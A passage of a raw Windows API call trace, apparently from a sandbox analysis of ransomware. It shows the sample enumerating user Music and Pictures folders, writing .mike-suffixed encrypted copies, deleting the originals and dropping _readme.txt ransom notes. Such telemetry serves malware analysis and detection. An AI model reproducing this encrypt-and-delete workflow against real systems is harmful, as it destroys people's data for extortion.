lpNumberOfBytesWritten=0x2af0bc*=0x510, lpOverlapped=0x0) returned 1 [0154.794] WriteFile (in: hFile=0x1c8, lpBuffer=0x20ff1b4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x20ff1b4*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0154.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.795] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.795] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav", dwFileAttributes=0x80) returned 1 [0154.796] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j-w7ymi\\v9n3m3z t8pt07i5ew.wav")) returned 1 [0154.797] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\_readme.txt", lpFilePart=0x0) returned 0x37 [0154.798] WriteFile (in: hFile=0x1c8, lpBuffer=0x21024c8*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x21024c8*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0154.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f45af0, ftCreationTime.dwHighDateTime=0x1d4c8dd, ftLastAccessTime.dwLowDateTime=0xa3234750, ftLastAccessTime.dwHighDateTime=0x1d4ce2f, ftLastWriteTime.dwLowDateTime=0xa3234750, ftLastWriteTime.dwHighDateTime=0x1d4ce2f, nFileSizeHigh=0x0, nFileSizeLow=0x1305c, dwReserved0=0x0, dwReserved1=0x0, cFileName="0Hsn9vN-GR4PEp.m4a", cAlternateFileName="0HSN9V~1.M4A")) returned 1 [0154.800] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2557a460, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2557a460, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x257dba60, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x18f00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ibl0Tc-fgpi8Er.wav.mike", cAlternateFileName="IBL0TC~1.MIK")) returned 1 [0154.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x866f88c0, ftCreationTime.dwHighDateTime=0x1d4cdb8, ftLastAccessTime.dwLowDateTime=0xb2c4fee0, ftLastAccessTime.dwHighDateTime=0x1d4c96d, ftLastWriteTime.dwLowDateTime=0xb2c4fee0, ftLastWriteTime.dwHighDateTime=0x1d4c96d, nFileSizeHigh=0x0, nFileSizeLow=0xf42c, dwReserved0=0x0, dwReserved1=0x0, cFileName="m5eu_.m4a", cAlternateFileName="")) returned 1 [0154.801] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25801bc0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25801bc0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2584de80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x7480, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ubl8OZMvn-Vh.wav.mike", cAlternateFileName="UBL8OZ~1.MIK")) returned 1 [0154.802] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25873fe0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25873fe0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x258c02a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x16f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="v9n3M3Z T8pT07I5Ew.wav.mike", cAlternateFileName="V9N3M3~1.MIK")) returned 1 [0154.802] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25801bc0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25801bc0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x258c02a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0154.803] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25801bc0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25801bc0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x258c02a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0154.803] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.803] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.803] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.804] CoTaskMemFree (pv=0x508980) [0154.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.804] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy", lpFilePart=0x0) returned 0x2a [0154.805] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8f0ca80, ftCreationTime.dwHighDateTime=0x1d4cc0c, ftLastAccessTime.dwLowDateTime=0x620d4030, ftLastAccessTime.dwHighDateTime=0x1d4d5a6, ftLastWriteTime.dwLowDateTime=0x620d4030, ftLastWriteTime.dwHighDateTime=0x1d4d5a6, nFileSizeHigh=0x0, nFileSizeLow=0x142e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="n_GRgFvip8fuKB4wPPy.m4a", cAlternateFileName="N_GRGF~1.M4A")) returned 1 [0154.806] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.806] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0154.806] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3.mike", lpFilePart=0x0) returned 0x44 [0154.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3", lpFilePart=0x0) returned 0x3f [0154.807] WriteFile (in: hFile=0x1c8, lpBuffer=0x210c378*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x210c378*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0154.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3.mike", lpFilePart=0x0) returned 0x44 [0154.812] WriteFile (in: hFile=0x1c8, lpBuffer=0x211b138*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x211b138*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0154.812] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3.mike", lpFilePart=0x0) returned 0x44 [0154.813] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3.mike", lpFilePart=0x0) returned 0x44 [0154.813] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3", dwFileAttributes=0x80) returned 1 [0154.813] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\tHB FXYfB18YQjQU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\u0n7fy\\thb fxyfb18yqjqu.mp3")) returned 1 [0154.814] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u0n7Fy\\_readme.txt", lpFilePart=0x0) returned 0x36 [0154.815] WriteFile (in: hFile=0x1c8, lpBuffer=0x211e3f0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x211e3f0*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0154.817] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8f0ca80, ftCreationTime.dwHighDateTime=0x1d4cc0c, ftLastAccessTime.dwLowDateTime=0x620d4030, ftLastAccessTime.dwHighDateTime=0x1d4d5a6, ftLastWriteTime.dwLowDateTime=0x620d4030, ftLastWriteTime.dwHighDateTime=0x1d4d5a6, nFileSizeHigh=0x0, nFileSizeLow=0x142e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="n_GRgFvip8fuKB4wPPy.m4a", cAlternateFileName="N_GRGF~1.M4A")) returned 1 [0154.817] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e300f10, ftCreationTime.dwHighDateTime=0x1d4d1e7, ftLastAccessTime.dwLowDateTime=0x800a4010, ftLastAccessTime.dwHighDateTime=0x1d4d38a, ftLastWriteTime.dwLowDateTime=0x800a4010, ftLastWriteTime.dwHighDateTime=0x1d4d38a, nFileSizeHigh=0x0, nFileSizeLow=0x8482, dwReserved0=0x0, dwReserved1=0x0, cFileName="oURjiRdw wAgo6.m4a", cAlternateFileName="OURJIR~1.M4A")) returned 1 [0154.818] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x258e6400, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x258e6400, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x258e6400, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x1970, dwReserved0=0x0, dwReserved1=0x0, cFileName="tHB FXYfB18YQjQU.mp3.mike", cAlternateFileName="THBFXY~1.MIK")) returned 1 [0154.818] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce9362a0, ftCreationTime.dwHighDateTime=0x1d4cd6a, ftLastAccessTime.dwLowDateTime=0x7ea9ce20, ftLastAccessTime.dwHighDateTime=0x1d4cdd6, ftLastWriteTime.dwLowDateTime=0x7ea9ce20, ftLastWriteTime.dwHighDateTime=0x1d4cdd6, nFileSizeHigh=0x0, nFileSizeLow=0xb157, dwReserved0=0x0, dwReserved1=0x0, cFileName="u4dOcnbvkgXTC.m4a", cAlternateFileName="U4DOCN~1.M4A")) returned 1 [0154.819] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x258e6400, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x258e6400, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x258e6400, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0154.819] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x258e6400, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x258e6400, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x258e6400, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0154.819] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.819] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.819] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.820] CoTaskMemFree (pv=0x508980) [0154.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpFilePart=0x0) returned 0x2a [0154.822] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.822] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.822] CoTaskMemFree (pv=0x508980) [0154.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.823] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpFilePart=0x0) returned 0x25 [0154.825] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.825] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.825] CoTaskMemFree (pv=0x508980) [0154.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpFilePart=0x0) returned 0x26 [0154.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55d5daa0, ftCreationTime.dwHighDateTime=0x1d4d242, ftLastAccessTime.dwLowDateTime=0x43bddc80, ftLastAccessTime.dwHighDateTime=0x1d4c9ca, ftLastWriteTime.dwLowDateTime=0x43bddc80, ftLastWriteTime.dwHighDateTime=0x1d4c9ca, nFileSizeHigh=0x0, nFileSizeLow=0x18b01, dwReserved0=0x0, dwReserved1=0x0, cFileName="bVSn.jpg", cAlternateFileName="")) returned 1 [0154.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa42d6ce0, ftCreationTime.dwHighDateTime=0x1d4cbd5, ftLastAccessTime.dwLowDateTime=0xeab8d680, ftLastAccessTime.dwHighDateTime=0x1d4c7e4, ftLastWriteTime.dwLowDateTime=0xeab8d680, ftLastWriteTime.dwHighDateTime=0x1d4c7e4, nFileSizeHigh=0x0, nFileSizeLow=0x5df1, dwReserved0=0x0, dwReserved1=0x0, cFileName="yDh2e.bmp", cAlternateFileName="")) returned 1 [0154.827] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.827] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0154.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.828] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg", lpFilePart=0x0) returned 0x2f [0154.828] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.828] WriteFile (in: hFile=0x1c8, lpBuffer=0x212984c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x212984c*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0154.829] CloseHandle (hObject=0x1c8) returned 1 [0154.831] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.832] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.835] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.837] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.838] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.839] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.840] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.842] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.843] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.844] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.846] WriteFile (in: hFile=0x1c8, lpBuffer=0x21b15fc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21b15fc*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0154.846] CloseHandle (hObject=0x1c8) returned 1 [0154.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg", lpFilePart=0x0) returned 0x2f [0154.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg.mike", lpFilePart=0x0) returned 0x34 [0154.846] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg", dwFileAttributes=0x80) returned 1 [0154.847] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg", lpFilePart=0x0) returned 0x2f [0154.847] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bvsn.jpg")) returned 1 [0154.849] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bVSn.jpg", lpFilePart=0x0) returned 0x2f [0154.849] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_readme.txt", lpFilePart=0x0) returned 0x32 [0154.849] WriteFile (in: hFile=0x1c8, lpBuffer=0x21b46d4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21b46d4*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0154.850] CloseHandle (hObject=0x1c8) returned 1 [0154.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x32 [0154.851] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, 